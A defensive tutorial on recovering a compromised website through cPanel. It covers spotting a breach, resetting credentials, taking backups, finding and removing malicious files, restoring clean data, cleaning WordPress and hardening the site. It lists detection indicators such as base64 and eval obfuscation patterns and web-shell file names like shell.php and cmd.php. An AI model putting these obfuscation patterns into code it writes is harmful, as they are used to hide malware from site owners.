Website hacking incidents can affect businesses, blogs, e-commerce stores, and organizational websites of any size. A compromised website may result in data loss, malware infections, search engine blacklisting, reduced visitor trust, and financial losses. Fortunately, cPanel provides website administrators with several tools that can help identify, isolate, and recover from a security breach.
This guide explains the process of recovering a hacked website in cPanel, from identifying the attack to restoring normal operations and strengthening security afterward.
Signs That Your Website Has Been Hacked
Before beginning recovery, confirm that the website has actually been compromised. Common indicators include:
- Unexpected redirects to unfamiliar websites
- Suspicious pop-ups appearing on pages
- New administrator accounts you did not create
- Modified website content
- Search engines displaying warnings about malware
- Unusual spikes in bandwidth usage
- Website files changing without authorization
- Hosting provider security alerts
- Website sending spam emails
Other signs may include slow website performance, unauthorized cron jobs, and unfamiliar files appearing in the public_html directory.
Immediate Actions After Discovering a Hack
The first few hours after discovering a compromise are critical.
1. Change All Passwords
Immediately update:
- cPanel password
- Hosting account password
- FTP accounts
- SSH accounts
- Website administrator accounts
- Database user passwords
- Email account passwords
Use strong passwords containing:
- Uppercase letters
- Lowercase letters
- Numbers
- Special characters
Avoid reusing passwords across multiple services.
2. Enable Maintenance Mode
If possible, place the website in maintenance mode to prevent visitors from accessing infected content while recovery is underway.
For WordPress websites, maintenance plugins can be used to temporarily disable public access.
3. Notify Your Hosting Provider
Many hosting providers have security teams that can:
- Identify malicious files
- Review server logs
- Assist with malware removal
- Provide backup restoration options
Contact support immediately and explain the nature of the compromise.
Creating a Backup Before Recovery
Before removing files, create a complete backup.
Using cPanel Backup Tool
Navigate to:
cPanel → Files → Backup
Create backups of:
- Home Directory
- Databases
- Email Forwarders
- Email Filters
Store these backups in a secure location. Even infected backups can be useful for forensic analysis later.
Identifying Malicious Files
Hackers often upload:
- Backdoors
- Shell scripts
- Spam scripts
- Cryptocurrency miners
- Redirect malware
Common Locations to Check
Review these directories carefully:
/public_html/
/tmp/
/uploads/
/wp-content/uploads/
/images/
/cache/
Look for:
- Randomly named PHP files
- Recently modified files
- Obfuscated code
- Files with unusual permissions
Examples include:
eval(base64_decode())
gzinflate(base64_decode())
str_rot13()
Such code patterns are frequently used to conceal malware.
Using cPanel File Manager for Investigation
Open:
cPanel → File Manager
Sort files by:
- Modification Date
- Size
- File Type
Look for files modified around the time the compromise occurred.
Common suspicious file names include:
wp-vcd.php
shell.php
cmd.php
up.php
adminer.php
cache.php
However, attackers often use legitimate-looking names to avoid detection.
Scanning for Malware
Many hosting providers offer malware scanning tools within cPanel.
Examples include:
- ImunifyAV
- Imunify360
- ClamAV
- SiteLock
Run a complete scan of:
- Website files
- Databases
- Email accounts
Document all infected files before deleting them.
Restoring from a Clean Backup
If a recent clean backup exists, restoration is usually the fastest recovery method.
Restore Website Files
In cPanel:
Files → Backup → Restore Home Directory
Upload the clean backup and restore website files.
Restore Databases
Navigate to:
Files → Backup → Restore MySQL Databases
Restore the most recent clean database backup.
Ensure the backup was created before the compromise occurred.
Cleaning a WordPress Website
WordPress is one of the most frequently targeted platforms.
Reinstall Core Files
Download a fresh copy of WordPress from the official source.
Replace:
/wp-admin/
/wp-includes/
Do not overwrite:
wp-config.php
wp-content
without first verifying their contents.
Remove Unused Plugins and Themes
Delete:
- Inactive plugins
- Unused themes
- Outdated extensions
These components are often exploited by attackers.
Update Everything
Update:
- WordPress core
- Plugins
- Themes
Security patches frequently address known vulnerabilities.
Checking the Database
Attackers sometimes inject malicious code directly into the database.
Using:
cPanel → phpMyAdmin
Review:
- wp_options
- wp_posts
- wp_users
Look for:
- Suspicious administrator accounts
- Hidden redirects
- Embedded malicious JavaScript
- Unauthorized settings changes
Delete unauthorized entries carefully.
Reviewing Website Permissions
Incorrect file permissions can make hacking easier.
Recommended permissions include:
| Item | Permission |
|---|---|
| Files | 644 |
| Directories | 755 |
| wp-config.php | 600 or 640 |
Avoid:
777
permissions whenever possible.
Reviewing Cron Jobs
Attackers sometimes create automated tasks that reinstall malware after removal.
Navigate to:
cPanel → Advanced → Cron Jobs
Check for:
- Unfamiliar commands
- Suspicious URLs
- Encoded scripts
Remove any unauthorized entries.
Reviewing Email Accounts
Compromised hosting accounts are often used to send spam.
Check:
cPanel → Email Accounts
Look for:
- Unauthorized accounts
- Unknown forwarders
- Spam activity
Delete suspicious accounts immediately.
Checking Access Logs
Access logs help determine how attackers entered the system.
In cPanel, review:
Metrics → Raw Access
Look for:
- Repeated login attempts
- Access from unfamiliar IP addresses
- Requests targeting vulnerable scripts
- File upload activity
Understanding the entry point helps prevent future attacks.
Removing Search Engine Warnings
After cleanup, search engines may continue displaying warnings.
Google Search Console
Use Google Search Console to:
- Verify website ownership
- Review security issues
- Request a security review
Google will rescan the site and remove warnings once the threat is eliminated.
Strengthening Website Security After Recovery
Recovery should always be followed by security improvements.
Enable Two-Factor Authentication
Many hosting providers support:
cPanel → Security → Two-Factor Authentication
This significantly reduces account takeover risks.
Install a Web Application Firewall
A firewall can block:
- SQL injection attacks
- Cross-site scripting attempts
- Brute-force login attacks
Limit Login Attempts
Protect administrator panels against password guessing attacks.
Disable Unused Services
Remove:
- Unused plugins
- Old applications
- Test installations
- Legacy scripts
Reducing the attack surface improves security.
Schedule Automated Backups
Implement:
- Daily backups for active websites
- Weekly full backups
- Offsite backup storage
Reliable backups can reduce recovery time from days to minutes.
Preventing Future Website Hacks
The best defense is a proactive security strategy.
Key practices include:
- Keep software updated.
- Use strong passwords.
- Enable two-factor authentication.
- Perform regular malware scans.
- Monitor website logs.
- Restrict file permissions.
- Remove unused applications.
- Maintain secure backups.
- Use SSL certificates.
- Monitor administrator accounts.
Organizations that regularly update software, review security logs, and maintain verified backups are far less likely to experience prolonged downtime after a security incident.
Recovering a hacked website in cPanel requires a structured approach: isolate the threat, preserve evidence, identify malicious files, restore clean data, secure user accounts, and strengthen defenses. While the recovery process may appear complex, following a systematic procedure can restore website functionality and significantly reduce the risk of future compromises.
